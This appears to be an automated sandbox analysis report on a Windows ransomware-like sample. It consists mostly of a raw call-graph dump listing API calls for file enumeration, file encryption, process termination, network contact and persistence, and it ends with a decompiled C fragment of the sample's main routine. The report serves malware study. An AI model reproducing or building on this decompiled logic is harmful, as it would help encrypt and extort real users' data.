lstrcatW 1841->1842 1843 4069dc 1841->1843 1842->1843 1844 4069e1 lstrcatW lstrcatW lstrcatW lstrcatW 1843->1844 1845 4069fd 1843->1845 1844->1845 1846 406a03 lstrcatW lstrcatW lstrcatW lstrcatW 1845->1846 1847 406a1f 1845->1847 1846->1847 1848 406a41 1847->1848 1849 406a25 lstrcatW lstrcatW lstrcatW lstrcatW 1847->1849 1850 406a63 1848->1850 1851 406a47 lstrcatW lstrcatW lstrcatW lstrcatW 1848->1851 1849->1848 1852 406a85 1850->1852 1853 406a69 lstrcatW lstrcatW lstrcatW lstrcatW 1850->1853 1851->1850 1854 406aa7 1852->1854 1855 406a8b lstrcatW lstrcatW lstrcatW lstrcatW 1852->1855 1853->1852 1856 406ac9 1854->1856 1857 406aad lstrcatW lstrcatW lstrcatW lstrcatW 1854->1857 1855->1854 1858 406aeb 1856->1858 1859 406acf lstrcatW lstrcatW lstrcatW lstrcatW 1856->1859 1857->1856 1860 406af1 VirtualAlloc 1858->1860 1861 406b5c 1858->1861 1859->1858 1864 406b21 wsprintfW 1860->1864 1865 406b0c wsprintfW 1860->1865 1862 406b62 lstrcatW lstrcatW lstrcatW lstrcatW 1861->1862 1863 406b7e lstrlenW 1861->1863 1862->1863 1863->1624 1866 406b30 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1864->1866 1865->1866 1866->1861 1868 40773b 1867->1868 1869 40772f VirtualFree 1867->1869 1870 407741 VirtualFree 1868->1870 1871 40774d 1868->1871 1869->1868 1870->1871 1872 407753 VirtualFree 1871->1872 1873 40775f 1871->1873 1872->1873 1874 407771 1873->1874 1875 407765 VirtualFree 1873->1875 1876 407783 1874->1876 1877 407777 VirtualFree 1874->1877 1875->1874 1878 407795 1876->1878 1879 407789 VirtualFree 1876->1879 1877->1876 1880 4077a7 1878->1880 1881 40779b VirtualFree 1878->1881 1879->1878 1882 4077b9 1880->1882 1883 4077ad VirtualFree 1880->1883 1881->1880 1884 4077cb 1882->1884 1885 4077bf VirtualFree 1882->1885 1883->1882 1886 40462a 1884->1886 1887 4077d4 VirtualFree 1884->1887 1885->1884 1886->1574 1886->1575 1887->1886 1889 406d32 RegQueryValueExW 1888->1889 1890 406d7e 1888->1890 1891 406d51 RegCloseKey 1889->1891 1892 406d66 GetLastError RegCloseKey 1889->1892 1890->1772 1891->1772 1892->1772 1894 4075e2 1893->1894 1895 4075bc CreateToolhelp32Snapshot 1893->1895 1894->1792 1896 4075d4 VirtualFree 1895->1896 1897 4075ed Process32FirstW 1895->1897 1896->1894 1898 4076dd VirtualFree CloseHandle 1897->1898 1905 40760d 1897->1905 1899 407707 1898->1899 1900 4076fd VirtualFree 1898->1900 1899->1792 1900->1899 1901 4076b7 1902 4076d5 1901->1902 1904 4076c5 lstrlenW 1901->1904 1902->1898 1903 407620 lstrcmpiW 1903->1905 1904->1902 1905->1901 1905->1903 1906 40764a lstrcpyW lstrcatW 1905->1906 1907 40765f lstrcatW lstrcatW 1905->1907 1908 407697 Process32NextW 1905->1908 1909 407670 lstrlenW 1906->1909 1907->1909 1908->1901 1910 4076a8 GetLastError 1908->1910 1909->1908 1910->1901 1910->1905 1921 4077f0 InternetOpenW 1911->1921 1915 406946 1916 406971 VirtualFree 1915->1916 1917 40694a lstrlenA 1915->1917 1919 406986 InternetCloseHandle 1916->1919 1920 40698d 1916->1920 1917->1916 1918 40695a wsprintfW 1917->1918 1918->1916 1919->1920 1920->1807 1920->1817 1922 406902 VirtualAlloc lstrlenW 1921->1922 1923 4079dd InternetOpenW 1921->1923 1924 407a00 1922->1924 1923->1922 1925 407a12 InternetCloseHandle 1924->1925 1926 407a19 1924->1926 1925->1926 1927 4077f0 2 API calls 1926->1927 1928 407a20 InternetConnectW 1927->1928 1929 407a51 VirtualAlloc wsprintfW HttpOpenRequestW 1928->1929 1930 407a48 1928->1930 1931 407aa1 HttpAddRequestHeadersW 1929->1931 1932 407b72 InternetCloseHandle InternetCloseHandle VirtualFree 1929->1932 1930->1915 1931->1932 1933 407b06 HttpSendRequestW 1931->1933 1932->1915 1934 407b6c GetLastError 1933->1934 1935 407b1d InternetReadFile 1933->1935 1934->1932 1935->1932 1936 407b3c 1935->1936 1936->1932 1937 407b47 InternetReadFile 1936->1937 1937->1936 1938 407b6a 1937->1938 1938->1932 1939->1645 1941 405dd5 CryptGenKey 1940->1941 1942 405d9f GetLastError 1940->1942 1944 405df1 1941->1944 1945 405df2 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 1941->1945 1943 405dac CryptAcquireContextW 1942->1943 1946 405dc5 1942->1946 1943->1946 1947 405dcc 1943->1947 1944->1945 1945->1946 1946->1585 1947->1941 1948->1666 1950 405a9c lstrlenA 1949->1950 1950->1694 1952 4077f0 2 API calls 1951->1952 1953 40538c 1952->1953 1969 404eb0 VirtualAlloc 1953->1969 1956 4053d3 lstrcatA lstrcatA lstrlenA 1958 408b30 _memset 1956->1958 1959 405462 lstrcpyW 1958->1959 1978 405270 VirtualAlloc GetModuleFileNameW CreateFileW 1959->1978 1961 405482 lstrlenW lstrlenA 1962 407a00 15 API calls 1961->1962 1963 4054c4 1962->1963 1964 4054f8 VirtualFree VirtualFree VirtualFree 1963->1964 1988 405050 lstrlenA VirtualAlloc 1963->1988 1965 405527 InternetCloseHandle 1964->1965 1966 40552e 1964->1966 1965->1966 1966->1705 1966->1706 1968 4054e4 1968->1964 1970 404fc0 lstrlenA VirtualAlloc VirtualAlloc 1969->1970 1971 404f2e 1969->1971 1970->1956 1972 404f52 lstrlenW VirtualAlloc 1971->1972 1973 404f47 Sleep 1971->1973 2018 404d60 CreatePipe 1972->2018 1973->1972 1975 404f78 lstrcmpiA 1976 404fa0 wsprintfW VirtualFree 1975->1976 1977 404f88 VirtualFree 1975->1977 1976->1970 1977->1971 1979 405357 VirtualFree 1978->1979 1980 4052c9 CreateFileMappingW 1978->1980 1979->1961 1981 405350 CloseHandle 1980->1981 1982 4052e1 MapViewOfFile 1980->1982 1981->1979 1983 405347 CloseHandle 1982->1983 1984 4052f7 lstrlenW lstrlenA 1982->1984 1983->1981 1985 405338 UnmapViewOfFile 1984->1985 1986 405314 lstrlenA 1984->1986 1985->1983 1986->1985 1989 40508b CryptStringToBinaryA 1988->1989 1991 4050b3 _memset 1989->1991 1992 40525e GetLastError 1989->1992 1994 4050f7 lstrlenA 1991->1994 1993 405245 VirtualFree 1992->1993 1993->1968 1995 405113 1994->1995 2047 4033e0 1995->2047 1998 405266 2057 404fd0 VirtualAlloc VirtualAlloc 1998->2057 1999 40513f 2001 405151 lstrlenA VirtualAlloc 1999->2001 2002 4051ee 1999->2002 2006 405171 CryptStringToBinaryA 2001->2006 2004 4051f5 lstrlenA VirtualAlloc 2002->2004 2005 40521a 2002->2005 2004->2005 2008 405212 lstrcpyA 2004->2008 2009 405236 2005->2009 2015 40522e HeapFree 2005->2015 2011 405194 VirtualAlloc 2006->2011 2012 4051de VirtualFree 2006->2012 2008->2005 2010 405242 2009->2010 2016 40523f HeapFree 2009->2016 2010->1993 2013 4051b0 MultiByteToWideChar 2011->2013 2014 4051ca 2011->2014 2012->2002 2013->2014 2017 4051d2 GetLastError 2013->2017 2014->2012 2015->2009 2016->2010 2017->2014 2019 404e09 SetHandleInformation 2018->2019 2020 404dff 2018->2020 2019->2020 2021 404e1f CreatePipe SetHandleInformation 2019->2021 2020->1975 2021->2020 2022 404e45 VirtualAlloc 2021->2022 2023 404e95 lstrcpyA 2022->2023 2024 404e5f wsprintfW 2022->2024 2023->1975 2029 404b10 2024->2029 2026 404e75 2034 404cb0 2026->2034 2030 408b30 _memset 2029->2030 2031 404b2e CreateProcessW 2030->2031 2032 404b84 CloseHandle CloseHandle 2031->2032 2033 404b79 GetLastError 2031->2033 2032->2026 2033->2026 2039 404cbd 2034->2039 2035 404cc6 ReadFile 2036 404d35 2035->2036 2035->2039 2037 404d53 VirtualFree 2036->2037 2040 404ba0 2036->2040 2037->1975 2039->2035 2039->2036 2043 404bcb 2040->2043 2041 404c05 lstrcpyA 2041->2037 2042 404c63 lstrlenA 2045 404c70 lstrcpyA 2042->2045 2043->2041 2043->2042 2044 404c5d 2043->2044 2044->2041 2045->2037 2061 4032b0 lstrlenA 2047->2061 2050 4034d9 ExitProcess 2052 403412 2052->1998 2052->1999 2054 403483 lstrlenA GetProcessHeap HeapAlloc 2055 403407 2054->2055 2056 4034a5 lstrcpyA 2054->2056 2055->2052 2055->2054 2065 403190 2055->2065 2069 403200 2055->2069 2056->2055 2058 405000 GetModuleFileNameW 2057->2058 2059 405039 ExitProcess 2057->2059 2058->2059 2060 405012 wsprintfW ShellExecuteW 2058->2060 2060->2059 2062 4032f8 2061->2062 2063 4032cf 2061->2063 2062->2050 2062->2055 2064 4032d0 lstrlenA 2063->2064 2064->2062 2064->2064 2066 4031b0 lstrcmpiA lstrcmpiA 2065->2066 2068 40319e 2065->2068 2066->2055 2067 4031f1 2067->2055 2068->2066 2068->2067 2073 403210 2069->2073 2070 40323d 2070->2055 2071 403250 lstrlenA GetProcessHeap HeapAlloc 2074 40328d 2071->2074 2072 40326d 2075 403272 lstrlenA GetProcessHeap HeapAlloc 2072->2075 2076 403299 2072->2076 2073->2070 2073->2071 2073->2072 2074->2076 2077 403291 lstrcpyA 2074->2077 2075->2074 2076->2055 2077->2076 2078->1716 2080 40556c wsprintfW 2079->2080 2105 4039b0 GetProcessHeap 2080->2105 2083 4055bf 2084 406d90 105 API calls 2083->2084 2085 4055ca 2084->2085 2086 406ba0 16 API calls 2085->2086 2087 4055d5 lstrlenW 2086->2087 2088 4069a0 49 API calls 2087->2088 2089 4055ed lstrlenW 2088->2089 2090 408b30 _memset 2089->2090 2091 405636 lstrlenA 2090->2091 2092 405652 2091->2092 2093 405667 CryptBinaryToStringA 2092->2093 2094 405692 lstrlenA VirtualAlloc lstrlenA 2093->2094 2095 40568c GetLastError 2093->2095 2096 4056be lstrlenA 2094->2096 2095->2094 2098 4056f2 2096->2098 2102 4056d5 lstrlenA 2096->2102 2099 405370 104 API calls 2098->2099 2101 4056fe VirtualFree 2099->2101 2103 407720 10 API calls 2101->2103 2102->2098 2104 40572d VirtualFree 2103->2104 2104->1724 2105->2083 2107 408b30 _memset 2106->2107 2108 403b37 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2107->2108 2108->1731 2109 406840 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2112 4066f0 2109->2112 2111 4068d0 VirtualFree ExitThread 2131 406110 VirtualAlloc 2112->2131 2114 406706 2115 406834 2114->2115 2143 4064a0 lstrlenW lstrcatW FindFirstFileW 2114->2143 2115->2111 2117 406715 2117->2115 2158 406640 VirtualAlloc wsprintfW CreateFileW 2117->2158 2119 406722 lstrlenW lstrcatW FindFirstFileW 2120 406764 2119->2120 2121 406758 2119->2121 2122 406770 lstrcmpW 2120->2122 2121->2111 2123 406813 FindNextFileW 2122->2123 2124 40678a lstrcmpW 2122->2124 2123->2122 2125 40682b FindClose 2123->2125 2124->2123 2126 4067a0 lstrcatW 2124->2126 2125->2115 2127 4067b3 lstrcatW 2126->2127 2130 4067cc 2126->2130 2128 4066f0 95 API calls 2127->2128 2128->2130 2130->2123 2164 4063b0 VirtualAlloc wsprintfW 2130->2164 2133 406137 2131->2133 2132 406228 VirtualFree 2132->2114 2133->2132 2134 4061a3 SHGetSpecialFolderPathW 2133->2134 2135 4061c1 SHGetSpecialFolderPathW 2134->2135 2136 4061b4 2134->2136 2137 4061db SHGetSpecialFolderPathW 2135->2137 2138 4061ce 2135->2138 2136->2132 2136->2135 2139 4061f5 SHGetSpecialFolderPathW 2137->2139 2140 4061e8 2137->2140 2138->2132 2138->2137 2141 406202 2139->2141 2142 40620f VirtualFree 2139->2142 2140->2132 2140->2139 2141->2132 2141->2142 2142->2114 2144 4064f0 lstrcmpW 2143->2144 2145 406612 FindNextFileW 2144->2145 2146 406506 lstrcmpW 2144->2146 2145->2144 2147 40662a FindClose 2145->2147 2146->2145 2148 40651c lstrcatW lstrlenW 2146->2148 2147->2117 2157 40653f 2148->2157 2149 406554 lstrcmpW 2150 406564 CreateFileW GetFileSize 2149->2150 2149->2157 2151 406591 VirtualAlloc 2150->2151 2152 4065f2 CloseHandle 2150->2152 2153 4065a6 ReadFile 2151->2153 2151->2157 2152->2147 2152->2157 2154 4065e1 VirtualFree 2153->2154 2153->2157 2154->2157 2155 4065c9 lstrlenA 2172 406440 lstrlenA 2155->2172 2157->2145 2157->2149 2157->2152 2157->2154 2157->2155 2159 40668c GetLastError 2158->2159 2160 40669e 2158->2160 2161 4066d0 VirtualFree 2159->2161 2162 4066c4 CloseHandle 2160->2162 2163 4066a7 lstrlenW WriteFile 2160->2163 2161->2119 2162->2161 2163->2162 2174 406300 2164->2174 2166 4063ea 2167 406407 VirtualFree 2166->2167 2178 406240 lstrlenW lstrlenW 2166->2178 2167->2130 2170 406403 2170->2167 2190 4035e0 GetFileAttributesW SetFileAttributesW 2170->2190 2173 40645a 2172->2173 2173->2157 2175 406313 lstrlenW 2174->2175 2176 40630c 2174->2176 2177 406325 2175->2177 2176->2166 2177->2166 2179 40625c 2178->2179 2180 40626e lstrcmpiW 2178->2180 2179->2180 2181 406283 2180->2181 2182 40628c lstrcmpiW 2180->2182 2181->2170 2182->2181 2183 406298 lstrcmpiW 2182->2183 2183->2181 2184 4062a4 lstrcmpiW 2183->2184 2184->2181 2185 4062b0 lstrcmpiW 2184->2185 2185->2181 2186 4062bc lstrcmpiW 2185->2186 2186->2181 2187 4062c8 lstrcmpiW 2186->2187 2187->2181 2188 4062d4 lstrcmpiW 2187->2188 2188->2181 2189 4062e0 lstrcmpiW 2188->2189 2189->2170 2217 405ea0 2190->2217 2194 4036a5 2195 407db0 9 API calls 2194->2195 2196 4036b5 VirtualAlloc VirtualAlloc 2195->2196 2230 406000 EnterCriticalSection CryptAcquireContextW 2196->2230 2199 403976 2200 403990 VirtualFree 2199->2200 2200->2167 2201 406000 10 API calls 2202 40374a 2201->2202 2203 403751 GetLastError 2202->2203 2204 40375c 2202->2204 2203->2199 2205 40376f CreateFileW 2204->2205 2205->2199 2206 40379b VirtualAlloc VirtualAlloc 2205->2206 2207 4037d4 ReadFile 2206->2207 2208 4038e0 VirtualFree 2207->2208 2214 4037d1 _memmove 2207->2214 2209 4038f6 WriteFile WriteFile WriteFile 2208->2209 2210 40392a CloseHandle VirtualFree VirtualFree VirtualFree 2208->2210 2209->2210 2210->2200 2211 40396a MoveFileW 2210->2211 2211->2200 2212 403828 VirtualAlloc 2212->2214 2213 403847 VirtualAlloc 2213->2214 2215 403885 VirtualFree SetFilePointer WriteFile 2213->2215 2214->2207 2214->2208 2214->2212 2214->2213 2214->2215 2216 4038c7 VirtualFree 2214->2216 2215->2214 2215->2216 2216->2208 2216->2214 2218 403626 VirtualAlloc lstrcpyW lstrcatW 2217->2218 2219 407db0 CryptAcquireContextW 2218->2219 2220 407ea2 2219->2220 2221 407dde VirtualAlloc 2219->2221 2220->2194 2223 407e08 2221->2223 2224 407eab CryptReleaseContext VirtualFree 2221->2224 2223->2224 2225 407e11 GetModuleHandleA 2223->2225 2224->2194 2226 407e65 GetProcAddress 2225->2226 2227 407e57 LoadLibraryA 2225->2227 2228 407e89 CryptReleaseContext VirtualFree 2226->2228 2229 407e74 2226->2229 2227->2226 2227->2228 2228->2220 2229->2228 2231 406038 GetLastError 2230->2231 2232 40606e CryptImportKey 2230->2232 2233 406045 CryptAcquireContextW 2231->2233 2237 403724 2231->2237 2234 4060f2 CryptReleaseContext LeaveCriticalSection 2232->2234 2235 406093 CryptGetKeyParam CryptEncrypt GetLastError 2232->2235 2236 406065 2233->2236 2233->2237 2234->2237 2235->2234 2238 4060ea 2235->2238 2236->2232 2237->2199 2237->2201 2238->2234 2239 408bc0 IsProcessorFeaturePresent 2240 408be6 2239->2240 2266 402c50 2267 402cda CreateThread DestroyWindow 2266->2267 2268 402c7b 2266->2268 2269 402c80 DefWindowProcW 2268->2269 2270 402c97 BeginPaint lstrlenW TextOutW EndPaint 2268->2270 2271 402d10 SendMessageW ExitThread 2272 402d30 2293 402f50 EnumDeviceDrivers 2272->2293 2274 402d8c 2275 402de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2274->2275 2278 402f50 7 API calls 2274->2278 2276 402e75 ExitThread 2275->2276 2277 402e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2275->2277 2279 402ec5 ShowWindow UpdateWindow CreateThread 2277->2279 2280 402ebe ExitThread 2277->2280 2281 402d99 2278->2281 2282 402ef4 GetMessageW 2279->2282 2283 402eed CloseHandle 2279->2283 2281->2275 2286 402f50 7 API calls 2281->2286 2284 402f0b 2282->2284 2285 402f3d ExitThread 2282->2285 2283->2282 2287 402f17 TranslateMessage DispatchMessageW 2284->2287 2288 402dce 2286->2288 2287->2285 2289 402f2c GetMessageW 2287->2289 2288->2285 2303 4030a0 2288->2303 2289->2285 2289->2287 2294 402f82 VirtualAlloc 2293->2294 2295 402f7d 2293->2295 2296 402f99 2294->2296 2297 402f9f EnumDeviceDrivers 2294->2297 2295->2274 2296->2274 2298 402ff2 VirtualFree 2297->2298 2299 402fae 2297->2299 2298->2274 2299->2298 2300 402fc0 GetDeviceDriverBaseNameW 2299->2300 2300->2299 2301 402fd9 lstrcmpiW 2300->2301 2301->2299 2302 403009 VirtualFree 2301->2302 2302->2274 2304 402f50 7 API calls 2303->2304 2305 403151 2304->2305 2306 402ddb 2305->2306 2307 402f50 7 API calls 2305->2307 2306->2285 2312 402ad0 VirtualAlloc 2306->2312 2308 403160 2307->2308 2308->2306 2309 402f50 7 API calls 2308->2309 2310 40316c 2309->2310 2310->2306 2311 402f50 7 API calls 2310->2311 2311->2306 2313 402b02 GetModuleFileNameW GetTempPathW 2312->2313 2315 402b48 2313->2315 2316 402b53 lstrlenW 2315->2316 2317 402b4c 2315->2317 2327 407c60 CryptAcquireContextW 2316->2327 2355 402960 lstrlenW 2317->2355 2319 402b8e GetEnvironmentVariableW 2321 402bac 2319->2321 2323 402bd8 lstrcatW lstrcatW lstrcatW 2321->2323 2326 402bb0 2321->2326 2322 402c45 ExitThread 2338 402890 CreateFileW 2323->2338 2325 402c2f wsprintfW 2325->2317 2326->2322 2326->2325 2328 407d79 2327->2328 2329 407c8b VirtualAlloc 2327->2329 2328->2319 2331 407d82 CryptReleaseContext VirtualFree 2329->2331 2332 407cbb 2329->2332 2331->2319 2332->2331 2333 407cc3 GetModuleHandleA 2332->2333 2334 407d17 GetProcAddress 2333->2334 2335 407d09 LoadLibraryA 2333->2335 2337 407d26 2334->2337 2335->2334 2335->2337 2336 407d60 CryptReleaseContext VirtualFree 2336->2328 2337->2336 2337->2337 2339 4028b8 GetFileSize 2338->2339 2340 4028f9 2338->2340 2360 403030 2339->2360 2340->2326 2343 403030 7 API calls 2344 4028d5 CreateFileMappingW 2343->2344 2345 402902 MapViewOfFile 2344->2345 2346 4028f2 CloseHandle 2344->2346 2347 402916 2345->2347 2348 402948 CloseHandle CloseHandle 2345->2348 2346->2340 2349 403030 7 API calls 2347->2349 2348->2326 2350 40291b 2349->2350 2351 40292b 2350->2351 2352 407db0 9 API calls 2350->2352 2365 402830 CreateFileW 2351->2365 2352->2351 2356 407c60 9 API calls 2355->2356 2357 4029ad RegCreateKeyExW 2356->2357 2358 402ac0 2357->2358 2359 402a8e lstrlenW RegSetValueExW RegCloseKey 2357->2359 2358->2322 2359->2322 2361 402f50 7 API calls 2360->2361 2362 40307f 2361->2362 2363 4028c8 2362->2363 2364 402f50 7 API calls 2362->2364 2363->2343 2364->2363 2366 40285b 2365->2366 2367 40287f UnmapViewOfFile 2365->2367 2368 402873 2366->2368 2369 40285f WriteFile 2366->2369 2367->2348 2370 402878 CloseHandle 2368->2370 2369->2368 2369->2370 2370->2367 2371 4047f8 2372 404800 lstrcmpiW 2371->2372 2373 4047f4 2372->2373 2374 40480f OpenProcess 2372->2374 2373->2372 2376 404844 Process32NextW 2373->2376 2374->2373 2375 404821 TerminateProcess CloseHandle 2374->2375 2375->2373 2376->2373 2377 404857 2376->2377 2378 404869 CloseHandle 2377->2378 2379 40485b VirtualFree 2377->2379 2379->2378 2241 406769 2242 406770 lstrcmpW 2241->2242 2243 406813 FindNextFileW 2242->2243 2244 40678a lstrcmpW 2242->2244 2243->2242 2245 40682b FindClose 2243->2245 2244->2243 2246 4067a0 lstrcatW 2244->2246 2248 406834 2245->2248 2247 4067b3 lstrcatW 2246->2247 2251 4067cc 2246->2251 2249 4066f0 104 API calls 2247->2249 2249->2251 2250 4063b0 62 API calls 2250->2251 2251->2243 2251->2250 2252 407369 2253 407370 GetDriveTypeW 2252->2253 2261 40738e 2253->2261 2254 407397 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 2256 407471 lstrcatW 2254->2256 2254->2261 2255 407491 lstrlenW 2257 4074a0 2255->2257 2256->2261 2258 4074a9 VirtualAlloc 2257->2258 2259 4074e4 2257->2259 2258->2259 2260 4074c7 2258->2260 2262 4068f0 21 API calls 2260->2262 2261->2253 2261->2254 2261->2255 2263 40740a lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 2261->2263 2264 4074ce 2262->2264 2263->2261 2264->2259 2265 4074d2 VirtualFree 2264->2265 2265->2259

                                      Callgraph

                                      • Executed
                                      • Not Executed
                                      • Opacity -> Relevance
                                      • Disassembly available
                                      callgraph 0 Function_00405C40 87 Function_00408B30 0->87 1 Function_00403FC0 9 Function_00405FC0 1->9 26 Function_00403DE0 1->26 54 Function_00405F80 1->54 2 Function_00404640 3 Function_00405540 3->0 33 Function_00405CF0 3->33 41 Function_00405370 3->41 59 Function_00406D90 3->59 69 Function_004069A0 3->69 78 Function_00407720 3->78 80 Function_00406BA0 3->80 3->87 93 Function_004039B0 3->93 4 Function_00406440 5 Function_00406640 6 Function_00406240 7 Function_00406840 42 Function_004066F0 7->42 8 Function_00408BC0 10 Function_00404550 10->59 10->69 10->78 10->80 10->93 11 Function_00402F50 12 Function_00405750 12->0 12->33 12->41 12->59 12->69 12->78 12->80 12->87 12->93 13 Function_00405050 13->0 16 Function_00404FD0 13->16 22 Function_004033E0 13->22 13->33 13->87 14 Function_00402C50 15 Function_00402AD0 21 Function_00402960 15->21 23 Function_00407C60 15->23 66 Function_00402890 15->66 77 Function_00407BA0 15->77 17 Function_00404D60 60 Function_00404B10 17->60 81 Function_00404CB0 17->81 18 Function_004035E0 19 Function_004084E0 18->19 20 Function_00407EE0 18->20 50 Function_00406000 18->50 68 Function_00405EA0 18->68 84 Function_00407DB0 18->84 21->23 47 Function_00403200 22->47 65 Function_00403190 22->65 74 Function_00403320 22->74 88 Function_004032B0 22->88 24 Function_00405E60 25 Function_00403A60 26->3 27 Function_00403AE0 27->87 28 Function_00408AE4 29 Function_00408768 30 Function_00406769 30->42 82 Function_004063B0 30->82 31 Function_00407369 37 Function_00408470 31->37 38 Function_004068F0 31->38 32 Function_004088EC 34 Function_00404AF0 71 Function_004048A0 34->71 35 Function_00403FF0 36 Function_004034F0 39 Function_004077F0 38->39 49 Function_00407A00 38->49 40 Function_00405270 41->13 41->39 41->40 41->49 83 Function_00404EB0 41->83 41->87 42->5 42->42 61 Function_00406110 42->61 72 Function_004064A0 42->72 42->82 43 Function_00405EF0 46 Function_00405D80 43->46 44 Function_00403571 45 Function_004047F8 48 Function_00406300 49->39 50->36 51 Function_00402000 52 Function_00404B00 53 Function_00404880 55 Function_00408A09 56 Function_0040878C 57 Function_0040888E 58 Function_00406D10 59->37 59->38 59->58 79 Function_00407520 59->79 60->87 61->77 62 Function_00407C10 63 Function_00402D10 64 Function_00407510 66->84 90 Function_00403030 66->90 91 Function_00402830 66->91 67 Function_00408914 70 Function_00404BA0 71->1 71->2 71->9 71->10 71->12 71->24 71->25 71->26 71->35 71->43 71->53 71->68 73 Function_004040A0 71->73 76 Function_00403BA0 71->76 92 Function_00404330 71->92 72->4 72->62 73->59 73->69 73->77 73->78 73->80 73->93 75 Function_004030A0 75->11 76->25 76->27 81->70 85 Function_004084B0 81->85 82->6 82->18 82->48 83->17 86 Function_00408730 89 Function_00402D30 89->11 89->15 89->75 90->11 92->27 94 Function_004088BC

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E004048A0(void* __ecx) {
                                      				void* _v8;
                                      				CHAR* _v12;
                                      				int _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				void* _v32;
                                      				void* _v36;
                                      				void* _v40;
                                      				int _v44;
                                      				int _v48;
                                      				void* _v52;
                                      				char _v72;
                                      				void* _t50;
                                      				int _t75;
                                      				void* _t77;
                                      				short* _t98;
                                      				void* _t102;
                                      
                                      				_t82 = __ecx;
                                      				Sleep(0x3e8); // executed
                                      				_t50 = E00404550(_t82); // executed
                                      				if(_t50 != 0) {
                                      					ExitProcess(0); // executed
                                      				}
                                      				_v8 = CreateThread(0, 0, E00402D30, 0, 0, 0);
                                      				if(_v8 != 0) {
                                      					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                      						_t82 = _v8;
                                      						TerminateThread(_v8, 0);
                                      					}
                                      					CloseHandle(_v8);
                                      				}
                                      				E00404640();
                                      				E004040A0(_t82);
                                      				E00405EF0( &_v72);
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				_v24 = 0;
                                      				_v40 = 0;
                                      				_t97 =  &_v40;
                                      				E00405EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
                                      				_v44 = 0;
                                      				_v12 = 0;
                                      				if(E00404880(_v24) != 0) {
                                      					ExitProcess(0);
                                      				}
                                      				L8:
                                      				while(_v44 == 0) {
                                      					_t97 = _v40;
                                      					_t77 = E00405750(_v24, _v40, _v36, _v32,  &_v12);
                                      					_t102 = _t102 + 0xc;
                                      					if(_t77 != 0) {
                                      						_v44 = 1;
                                      					} else {
                                      						Sleep(0x2710);
                                      					}
                                      				}
                                      				E00405E60( &_v72);
                                      				_v28 = 0;
                                      				_v16 = 0;
                                      				_v48 = 0;
                                      				_v52 = 0;
                                      				__eflags = _v12;
                                      				if(_v12 != 0) {
                                      					_v16 = lstrlenA(_v12);
                                      					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
                                      					_t97 = _v12;
                                      					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
                                      					__eflags = _t75;
                                      					if(_t75 == 0) {
                                      						ExitProcess(0);
                                      					}
                                      					_v48 = 1;
                                      				}
                                      				E00403FF0();
                                      				InitializeCriticalSection(0x412ae8);
                                      				__eflags = _v48;
                                      				if(__eflags == 0) {
                                      					E00403DE0( &_v72);
                                      				} else {
                                      					_t97 = _v16;
                                      					E00403FC0(_v28, _v16, __eflags);
                                      				}
                                      				DeleteCriticalSection(0x412ae8);
                                      				__eflags = E00403A60();
                                      				if(__eflags != 0) {
                                      					E00404330(__eflags);
                                      				}
                                      				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                      				__eflags = _v20;
                                      				if(__eflags != 0) {
                                      					GetModuleFileNameW(0, _v20, 0x100);
                                      					E00403BA0(_v20, _t97, __eflags);
                                      					VirtualFree(_v20, 0, 0x8000);
                                      				}
                                      				__eflags =  *0x412ae4;
                                      				if( *0x412ae4 != 0) {
                                      					_t98 =  *0x412ae4; // 0x8d0000
                                      					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
                                      				}
                                      				return E00405FC0( &_v72);
                                      				goto L8;
                                      			}





















                                      0x004048a0
                                      0x004048ab
                                      0x004048b1
                                      0x004048b8
                                      0x004048bc
                                      0x004048bc
                                      0x004048d7
                                      0x004048de
                                      0x004048f4
                                      0x004048f8
                                      0x004048fc
                                      0x004048fc
                                      0x00404906
                                      0x00404906
                                      0x0040490c
                                      0x00404911
                                      0x00404919
                                      0x0040491e
                                      0x00404925
                                      0x0040492c
                                      0x00404933
                                      0x00404942
                                      0x0040494d
                                      0x00404952
                                      0x00404959
                                      0x0040496a
                                      0x0040496e
                                      0x0040496e
                                      0x00000000
                                      0x00404974
                                      0x00404986
                                      0x0040498c
                                      0x00404991
                                      0x00404996
                                      0x004049a5
                                      0x00404998
                                      0x0040499d
                                      0x0040499d
                                      0x004049ac
                                      0x004049b1
                                      0x004049b6
                                      0x004049bd
                                      0x004049c4
                                      0x004049cb
                                      0x004049d2
                                      0x004049d6
                                      0x004049e2
                                      0x004049f8
                                      0x00404a0b
                                      0x00404a0f
                                      0x00404a15
                                      0x00404a17
                                      0x00404a1b
                                      0x00404a1b
                                      0x00404a21
                                      0x00404a21
                                      0x00404a28
                                      0x00404a32
                                      0x00404a38
                                      0x00404a3c
                                      0x00404a4e
                                      0x00404a3e
                                      0x00404a3e
                                      0x00404a44
                                      0x00404a44
                                      0x00404a58
                                      0x00404a63
                                      0x00404a65
                                      0x00404a67
                                      0x00404a67
                                      0x00404a80
                                      0x00404a83
                                      0x00404a87
                                      0x00404a94
                                      0x00404a9d
                                      0x00404aad
                                      0x00404aad
                                      0x00404ab3
                                      0x00404aba
                                      0x00404ac2
                                      0x00404ad0
                                      0x00404ad0
                                      0x00404ae1
                                      0x00000000

                                      APIs
                                      • Sleep.KERNELBASE(000003E8), ref: 004048AB
                                        • Part of subcall function 00404550: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
                                        • Part of subcall function 00404550: lstrcpyW.KERNEL32 ref: 004045CF
                                        • Part of subcall function 00404550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
